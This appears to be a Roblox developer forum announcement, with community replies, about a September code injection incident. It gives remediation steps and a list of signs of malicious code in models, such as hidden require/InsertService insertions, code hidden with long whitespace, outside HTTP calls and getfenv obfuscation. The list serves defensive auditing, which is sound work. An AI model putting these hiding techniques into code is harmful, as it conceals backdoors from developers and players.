Update on Code Injection Incident (9/7-9/8)

Hey Developers,

We want to provide you with the latest update in regards to the code injection incident from Sept. 7-8 we communicated to you a couple of weeks ago: Recent Roblox Security Incident.

Many of you asked what we are doing to lock down the servers and provide extra security measures in the future. At this time, the goal is to provide you with an update on what we’ve done to ensure improvements in the security of the games created by our developer community. Here are a couple of the actionable items we have addressed:

• Completed a security audit of our infrastructure.
• Deployed continual automated auditing and scanning of our systems.

We will continue to work through our security roadmap to mitigate against potential security events in the future. Our priority is to continue providing open communication channels between our developer community and Roblox. In the future if you have information for us about a security vulnerability, please reach out to us directly and our team will actively collaborate with you to address the incident.

The insecure server was addressed immediately upon discovery and we are continuing to address the systematic issues resulting from this. Here’s what we learned from the incident:

• There were a handful of games that were confirmed with malicious code changes.
• We’ve identified a pattern from these incidents that we have been applying to our filters and potential other cases. If you have previously received an email from us regarding your place being potentially impacted, we highly encourage you to review your code and models carefully.
• We are aware of a few cases where models were impacted by unexpected code changes. Please keep in mind the potential impact in malicious models. We highly encourage you to actively begin auditing code in the models created by you or by others. We recommend that you review the code in your models for changes and if you are not sure revert to a version prior to Sept. 7.
• Remember, you can see a version history of your models by configuring them. You will see a history at the bottom of the configure page that looks like this:

Simply click on [ Make Current ] to switch your model back to an earlier version.

• Along with your own models, we recommend checking out any models made by other developers. There are guidelines below you can use to keep an eye out for malicious code.
• We are evaluating all reports related to this incident. If you discover any suspicious changes, please report those to us right away through devrelations@roblox.com so we can add those as part of the ongoing investigation on this incident.
• We have and will continue to do everything we can to reduce the risk from this incident. We ask you to be proactive in inspecting your code and models and reporting anything suspicious to us.

When you investigate your code (either in your scripts or models), there are a couple of common patterns to look out for:

• Insertion of arbitary models, either with InsertService or require(). You should make sure you are aware of all the assets that are inserted into your game.
• Lots of spaces. Sometimes a malicious coder will push their inserted text far to the right so it is not visible when simply scrolling through the file.
• HTTPService. You should be on the lookout for any web calls that are made to external services that you don’t have control over.
• Getfenv calls. Calls to various functions (such as the ones above) can be obfuscated using getfenv. Keep an eye out for any code that uses this function, particularly if the parameter that is passed in is long and complicated.

We want to assure you that we take incidents such as this one very seriously. We are actively working to close this particular issue and we will continue to look for other holes and exploits in the platform. Our goal is to make sure that we prevent as many issues as we can and to have quick and efficient response to issues we can’t prevent. The engagement level of our community is key to the success and security of our platform; therefore we highly encourage everyone to continue to report issues such as these directly to us. Please let us know if you have any further questions or concerns.

Thanks,
Developer Relations Team

Yes! More security!

These are great!

This should make scanning for any malicious code easier, if reverting is out of the question (don’t know how it would be, but hey). Cheers for the update.

Pack your bags, we’re going hunting.

Thank you for following up on the incident. It is rather concerning that it happened but I am glad that you guys are on the case.

I strongly encourage anyone creating or working on a game in team create (or on a published place via Edit…) to close out all script windows and use File->Download a Copy… (TC) or Save As… (published place) diligently at the end of each day or major work effort. If multiple team members do the same, even better! rbxl files are tiny, and frequent, incrementally named local backups are worth the piece of mind.

You say that you know of some games that were confirmed to have malicious code changes. Were they confirmed because the developer found malicious code or did staff search for it with some automated tool?

I bet to differ

I love to save every file as a new one incase something goes wrong. 33MB many times over is a lot lol.

Ha. I hope that’s a model repository or R.I.P. player load times

Yep model repository. It was actually causing some of my players to be unable to play the game around the time of my internship because of unintended replication that was a huge pain to locate.

Bonus tip: Keep them in cloud storage like OneDrive. If you main laptop/desktop goes, you can still continue work.

This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.